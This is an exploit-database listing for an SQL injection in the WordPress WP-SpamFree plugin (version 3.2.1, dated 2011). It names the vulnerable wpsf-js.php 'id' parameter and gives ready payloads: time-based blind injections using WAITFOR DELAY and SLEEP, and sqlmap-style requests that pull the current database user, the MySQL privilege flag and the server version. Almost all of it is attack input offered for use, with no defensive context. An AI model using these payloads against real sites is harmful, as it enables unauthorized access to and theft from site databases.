[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin WP-SpamFree Spam Plugin - SQL Injection

Author: cheki
type: webapps
platform: php
port: 
date_added: 2011-10-11 
date_updated: 2011-10-11 
verified: 0 
codes: OSVDB-83467 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwp-spamfree.zip
#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]
#Date: 2011-09-25
#Author: [cheki]
#Version:[3.2.1]
#Tested on:[linux]
#Used: ["sqlmap"]
#SQL Injection
http://<target>/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1

#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)

#[http://<taget>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()

#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM
mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)

#Home page: http://hacking.ge/
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.